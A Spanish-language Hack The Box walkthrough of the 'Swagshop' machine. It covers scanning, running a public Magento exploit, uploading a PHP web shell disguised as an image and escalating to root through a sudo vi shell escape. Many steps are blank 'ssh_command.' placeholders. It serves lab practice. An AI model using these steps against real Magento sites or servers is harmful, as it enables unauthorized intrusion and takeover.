Cu3rv0x
Swagshop

Swagshop


HTB Windows

nmap -A -p- -oA swagshop 10.129.95.151 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA swagshop 10.129.95.151

nmap -sU -O -p- -oA swagshop-udp 10.129.95.151

nikto -h 10.129.95.151:80

wfuzz -c -t 200 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://swagshop.htb/index.php/FUZZ

ssh_command.

ssh_command.

whatweb http://10.129.95.151

echo “10.129.95.151 swagshop.htb” | sudo tee -a /etc/hosts

ssh_command.

Vamos a http://swagshop.htb

ssh_command.

Vamos a http://swagshop.htb/index.php/admin

ssh_command.

searchsploit magento

ssh_command.

searchsploit -m 37977

ssh_command.

Cambiamos el target a la ip de la maquina

ssh_command.

python2 37977.py

ssh_command.

Vamos a system->Configuration->Developer

ssh_command.

ssh_command.

ssh_command.

Vamos a Catalog->Manage Categories

ssh_command.

Creamos un archivo llamado shell.php.png) Y le ponemos el siguiente codigo de php

ssh_command.

Le damos save category

ssh_command.

Vamos a newsletter y le damos click a Add New Template

ssh_command.

ssh_command.

Guardamos y le damos click a Preview Template

ssh_command.

whoami

cd /home/harris

ssh_command.

sudo -l

sudo -u root vi /var/www/html/test

ssh_command.

En vi hacemos lo siguiente

:set shell=/bin/bash

:shell

ssh_command.

ssh_command.

© 2025 Cu3rv0x